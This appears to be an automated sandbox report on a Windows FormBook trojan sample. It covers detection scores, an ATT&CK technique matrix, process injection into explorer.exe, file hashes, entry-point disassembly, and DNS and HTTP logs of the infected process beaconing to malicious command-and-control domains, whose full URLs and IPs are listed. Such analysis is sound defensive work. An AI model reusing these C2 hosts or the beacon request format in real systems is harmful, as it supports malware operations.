          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          [Figure: Behavior Graph, ID 601808. Sample: 4505682666.exe; Startdate: 02/04/2022; Architecture: WINDOWS; Score: 100. Process chain: 4505682666.exe dropped and started sfxwkrzgst.exe (PE32), which started a second sfxwkrzgst.exe, which injected into explorer.exe; explorer.exe started NETSTAT.EXE, which started cmd.exe, which started conhost.exe.]

          Source | Detection | Scanner | Label
          4505682666.exe | 43% | Virustotal |
          4505682666.exe | 52% | ReversingLabs | Win32.Trojan.FormBook
          4505682666.exe | 100% | Joe Sandbox ML |

          No Antivirus matches

          Source | Detection | Scanner | Label
          4.0.sfxwkrzgst.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.0.sfxwkrzgst.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.sfxwkrzgst.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.sfxwkrzgst.exe.2730000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.0.sfxwkrzgst.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Source | Detection | Scanner | Label
          9tv-cname.com | 1% | Virustotal |

          Source | Detection | Scanner | Label
          www.stxgvdhndry.mobi/iedi/ | 100% | Avira URL Cloud | malware
          https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1 | 0% | Avira URL Cloud | safe
          http://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ | 100% | Avira URL Cloud | malware
          http://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA | 100% | Avira URL Cloud | phishing
          http://www.taeksanglee.com/iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ | 100% | Avira URL Cloud | malware
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          9tv-cname.com | 23.225.32.156 | true | true | | unknown
          www.sarahkramirez.store | 104.21.60.208 | true | true | | unknown
          taeksanglee.com | 99.83.248.72 | true | true | | unknown
          www.ohhhmarketing.com | 203.170.80.250 | true | true | | unknown
          www.03gjm.xyz | unknown | unknown | true | | unknown
          www.taeksanglee.com | unknown | unknown | true | | unknown
          www.stxgvdhndry.mobi | unknown | unknown | true | | unknown
          www.supertry.online | unknown | unknown | true | | unknown
          www.malmaten.xyz | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.stxgvdhndry.mobi/iedi/ | true | Avira URL Cloud: malware | low
          http://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ | true | Avira URL Cloud: malware | unknown
          http://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA | true | Avira URL Cloud: phishing | unknown
          http://www.taeksanglee.com/iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ | true | Avira URL Cloud: malware | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1 | NETSTAT.EXE, 0000000F.00000002.513921900.00000000032E2000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://nsis.sf.net/NSIS_ErrorError | 4505682666.exe | false | | high
          IP | Domain | Country | ASN | ASN Name | Malicious
          99.83.248.72 | taeksanglee.com | United States | 16509 | AMAZON-02US | true
          104.21.60.208 | www.sarahkramirez.store | United States | 13335 | CLOUDFLARENETUS | true
          203.170.80.250 | www.ohhhmarketing.com | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
          23.225.32.156 | 9tv-cname.com | United States | 40065 | CNSERVERSUS | true
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:601808
                            Start date and time:2022-04-02 04:10:09 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:4505682666.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:27
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@9/3@7/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 60.6% (good quality ratio 57.9%)
                            • Quality average: 74%
                            • Quality standard deviation: 28.5%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 112
                            • Number of non-executed functions: 57
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, go.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes were analyzed, report is missing behavior information
                            No simulations
                                • 104.18.22.207
                                inq_20220104.xlsxGet hashmaliciousBrowse
                                • 188.114.96.7
                                http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https%3a%2f%2fjkywc4.codesandbox.io/?dg=bmljb2xhLmJhcmF0aEBpc2xhbmRoZWFsdGguY2EGet hashmaliciousBrowse
                                • 104.18.22.207
                                No context
                                No context
                                Process:C:\Users\user\Desktop\4505682666.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.8758035442709544
                                Encrypted:false
                                SSDEEP:48:vpgAo/orl75h+mShKHhMOxqVYyQKSTX8JegNdhmY+FTT05/KYmR:BPIihqhKHhMoqVYyQKS4egqHbVR
                                MD5:4745AFD382988B0E54FCA3B7C6CC62C6
                                SHA1:E883780E858C58535D2E8FA9C236917B5FCC03F2
                                SHA-256:F508111C2DB55EB87D8EF5977829DFF50A682162D33B8BD6B5291BD372A7228A
                                SHA-512:EE13008D1175E9E76E44D373411E9C30A24F0FBC306A009C3C46A73B2285D45D45E5977C4A7CD31E86A13D3C8D6BD951361222FF74A844BD678465C48F499B2F
                                Malicious:true
                                Reputation:low
                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Fb..........................................@..........................P............@.................................. .......0.......................@..L...................................................D!...............................text............................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\4505682666.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4987
                                Entropy (8bit):6.153215954287926
                                Encrypted:false
                                SSDEEP:96:6m1Dp+ikskmZ7XkR44jOpqFtq+DPvKn2h+yXVL85X:6mn+ikpmlryoik2hpaX
                                MD5:696BC3C6233536E21811A6584FDE5548
                                SHA1:D098830B1E95618142BCB303C20F8D5622670165
                                SHA-256:059DBCBCF09CE33D811996A820C05FCF5A6988BD117B1C1D8FF05C8872466903
                                SHA-512:96503993C3A18CE72BC4DE4EA48881DD3A01636F19545EDFA73F50E5DD7FC1F2599BDDD48BA2B0568BEBD6CEBF2338F2A51CAF6B56F5D1802895CD9B095A1E0D
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\4505682666.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):216529
                                Entropy (8bit):7.9902383214332175
                                Encrypted:true
                                SSDEEP:6144:316xrtbWc81NGvpQJUKSNbJ1xX5mDEvLxv:l6xZeX+pQJUKShxpEEVv
                                MD5:2F50D4AB85898AC09F51AB8F33E01409
                                SHA1:DBD29CE04B44FD327646EF8829D02A7107AB40C9
                                SHA-256:A89C7B2C66EB0700D4CBAF19C310660F4CC393FDD787CD6A0F223C07B7A2E3FB
                                SHA-512:16BDA569D14CEB00F9B4E35D93BC6EF72EC9B8EC57CAED0550F811AC21BA8DE9F9DD038F77F3E07F7B6D2E1FBA2CB9C2B7A67652E9451202CB6F716B4215A6ED
                                Malicious:false
                                Reputation:low
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.585394540341449
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:4505682666.exe
                                File size:313282
                                MD5:9746147d84cb3d6b7a91ac76fc7b74b2
                                SHA1:8c70e93e0c8c29b2be64703485c30be238dee7db
                                SHA256:6d40fb5818ad031394cb4fa6e0007d69bcdf4396b7f6af749badc7a080c776ae
                                SHA512:e42bfcb749c561270ecc820db1b73426dd7503bcdfd3601cf1a9256cdefce3b881a85ba4271fa03c00224abc2d6fec78a3fecfff503c95d72ab57a3019e8d7a1
                                SSDEEP:6144:RNeZIh2Wccgp0wvA9A+R5Fm8Rdb8FxFQQ5sbF:RNj4Wqp0wvZ+X3bYFQnR
                                TLSH:08648D90EA4CFCDAE4DA0573763A942C09919AD996F4009F37673E3465B3BD3207BE06
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                                Icon Hash:f6a6a68e9af2f074
                                Entrypoint:0x4034f7
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                Instruction
                                push ebp
                                mov ebp, esp
                                sub esp, 000003F4h
                                push ebx
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [ebp-14h], ebx
                                mov dword ptr [ebp-04h], 0040A2E0h
                                mov dword ptr [ebp-10h], ebx
                                call dword ptr [004080CCh]
                                mov esi, dword ptr [004080D0h]
                                lea eax, dword ptr [ebp-00000140h]
                                push eax
                                mov dword ptr [ebp-0000012Ch], ebx
                                mov dword ptr [ebp-2Ch], ebx
                                mov dword ptr [ebp-28h], ebx
                                mov dword ptr [ebp-00000140h], 0000011Ch
                                call esi
                                test eax, eax
                                jne 00007FD8D0CF84AAh
                                lea eax, dword ptr [ebp-00000140h]
                                mov dword ptr [ebp-00000140h], 00000114h
                                push eax
                                call esi
                                mov ax, word ptr [ebp-0000012Ch]
                                mov ecx, dword ptr [ebp-00000112h]
                                sub ax, 00000053h
                                add ecx, FFFFFFD0h
                                neg ax
                                sbb eax, eax
                                mov byte ptr [ebp-26h], 00000004h
                                not eax
                                and eax, ecx
                                mov word ptr [ebp-2Ch], ax
                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                jnc 00007FD8D0CF847Ah
                                and word ptr [ebp-00000132h], 0000h
                                mov eax, dword ptr [ebp-00000134h]
                                movzx ecx, byte ptr [ebp-00000138h]
                                mov dword ptr [0042A2D8h], eax
                                xor eax, eax
                                mov ah, byte ptr [ebp-0000013Ch]
                                movzx eax, ax
                                or eax, ecx
                                xor ecx, ecx
                                mov ch, byte ptr [ebp-2Ch]
                                movzx ecx, cx
                                shl eax, 10h
                                or eax, ecx
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0x10f90 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x6515 | 0x6600 | False | 0.661534926471 | data | 6.43970794855 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.45 | data | 5.14577456407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0xa000 | 0x20338 | 0x600 | False | 0.499348958333 | data | 4.01369865045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc | 0x3b000 | 0x10f90 | 0x11000 | False | 0.167710248162 | data | 5.04779716714 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country
                                RT_ICON | 0x3b190 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
                                RT_DIALOG | 0x4b9b8 | 0x100 | data | English | United States
                                RT_DIALOG | 0x4bab8 | 0x11c | data | English | United States
                                RT_DIALOG | 0x4bbd8 | 0x60 | data | English | United States
                                RT_GROUP_ICON | 0x4bc38 | 0x14 | data | English | United States
                                RT_MANIFEST | 0x4bc50 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                                DLL | Import
                                ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                Language of compilation system | Country where language is spoken
                                English | United States
                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                04/02/22-06:13:05.752479 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49857 | 99.83.248.72 | 192.168.2.3
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Apr 2, 2022 06:12:38.072242975 CEST | 192.168.2.3 | 8.8.8.8 | 0xb922 | Standard query (0) | www.stxgvdhndry.mobi | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:43.619493008 CEST | 192.168.2.3 | 8.8.8.8 | 0x6942 | Standard query (0) | www.malmaten.xyz | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:48.651667118 CEST | 192.168.2.3 | 8.8.8.8 | 0xc529 | Standard query (0) | www.supertry.online | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:54.440186024 CEST | 192.168.2.3 | 8.8.8.8 | 0x8c27 | Standard query (0) | www.sarahkramirez.store | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:59.543123960 CEST | 192.168.2.3 | 8.8.8.8 | 0xaa1a | Standard query (0) | www.03gjm.xyz | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:13:04.911705017 CEST | 192.168.2.3 | 8.8.8.8 | 0xc752 | Standard query (0) | www.taeksanglee.com | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:13:10.786650896 CEST | 192.168.2.3 | 8.8.8.8 | 0x67ab | Standard query (0) | www.ohhhmarketing.com | A (IP address) | IN (0x0001)
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Apr 2, 2022 06:12:38.599751949 CEST | 8.8.8.8 | 192.168.2.3 | 0xb922 | Name error (3) | www.stxgvdhndry.mobi | none | none | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:43.645440102 CEST | 8.8.8.8 | 192.168.2.3 | 0x6942 | Name error (3) | www.malmaten.xyz | none | none | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:49.397546053 CEST | 8.8.8.8 | 192.168.2.3 | 0xc529 | Server failure (2) | www.supertry.online | none | none | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:54.462097883 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c27 | No error (0) | www.sarahkramirez.store | | 104.21.60.208 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:54.462097883 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c27 | No error (0) | www.sarahkramirez.store | | 172.67.201.126 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa1a | No error (0) | www.03gjm.xyz | www.9tv-cname.com | | CNAME (Canonical name) | IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa1a | No error (0) | www.9tv-cname.com | 9tv-cname.com | | CNAME (Canonical name) | IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa1a | No error (0) | 9tv-cname.com | | 23.225.32.156 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa1a | No error (0) | 9tv-cname.com | | 104.233.177.157 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa1a | No error (0) | 9tv-cname.com | | 23.224.235.100 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa1a | No error (0) | 9tv-cname.com | | 23.225.30.43 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:13:05.232255936 CEST | 8.8.8.8 | 192.168.2.3 | 0xc752 | No error (0) | www.taeksanglee.com | taeksanglee.com | | CNAME (Canonical name) | IN (0x0001)
                                Apr 2, 2022 06:13:05.232255936 CEST | 8.8.8.8 | 192.168.2.3 | 0xc752 | No error (0) | taeksanglee.com | | 99.83.248.72 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:13:05.232255936 CEST | 8.8.8.8 | 192.168.2.3 | 0xc752 | No error (0) | taeksanglee.com | | 75.2.0.44 | A (IP address) | IN (0x0001)
                                Apr 2, 2022 06:13:10.822009087 CEST | 8.8.8.8 | 192.168.2.3 | 0x67ab | No error (0) | www.ohhhmarketing.com | | 203.170.80.250 | A (IP address) | IN (0x0001)
                                • www.sarahkramirez.store
                                • www.03gjm.xyz
                                • www.taeksanglee.com
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.3 | 49832 | 104.21.60.208 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Apr 2, 2022 06:12:54.497344017 CEST | 8564 | OUT | GET /iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ HTTP/1.1
                                Host: www.sarahkramirez.store
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Apr 2, 2022 06:12:54.537738085 CEST | 8565 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Sat, 02 Apr 2022 04:12:54 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Sat, 02 Apr 2022 05:12:54 GMT
                                Location: https://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPT8VpB4X3uQUWjRRRg09kMofZQk896lOlKc3nSbh4o01B%2Fgb4jnuzcVwHv%2FYbZZ7kPtihs7fVPBXfwHbEUHaUOE%2FOTEPiQ%2B3OBsZNlF3fe8Gh6dK8mVl9d2WSFuqHC5qGtYOIbjyRQMiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 6f56ba98ab0772ca-LHR
                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.3 | 49853 | 23.225.32.156 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Apr 2, 2022 06:12:59.734400034 CEST | 8614 | OUT | GET /iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA HTTP/1.1
                                Host: www.03gjm.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Apr 2, 2022 06:12:59.893215895 CEST | 8616 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Sat, 02 Apr 2022 04:12:59 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                2 | 192.168.2.3 | 49857 | 99.83.248.72 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Apr 2, 2022 06:13:05.251300097 CEST | 8627 | OUT | GET /iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ HTTP/1.1
                                Host: www.taeksanglee.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Apr 2, 2022 06:13:05.752479076 CEST | 8628 | IN | HTTP/1.1 403
                                Date: Sat, 02 Apr 2022 04:13:05 GMT
                                Content-Type: application/json;charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: JSESSIONID=FED7437DB0D0973D1DCAFC8A56C3DE27; Path=/; HttpOnly
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 1; mode=block
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: 0
                                Data Ascii: 77{"timestamp":"2022-04-02T04:13:05.615+0000","status":403,"error":"Forbidden","message":"Access Denied","path":"/iedi/"}
                                Apr 2, 2022 06:13:05.752692938 CEST | 8628 | IN | Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Target ID:0
                                Start time:06:11:11
                                Start date:02/04/2022
                                Path:C:\Users\user\Desktop\4505682666.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\4505682666.exe"
                                Imagebase:0x400000
                                File size:313282 bytes
                                MD5 hash:9746147D84CB3D6B7A91AC76FC7B74B2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:2
                                Start time:06:11:12
                                Start date:02/04/2022
                                Path:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe
                                Wow64 process (32bit):true
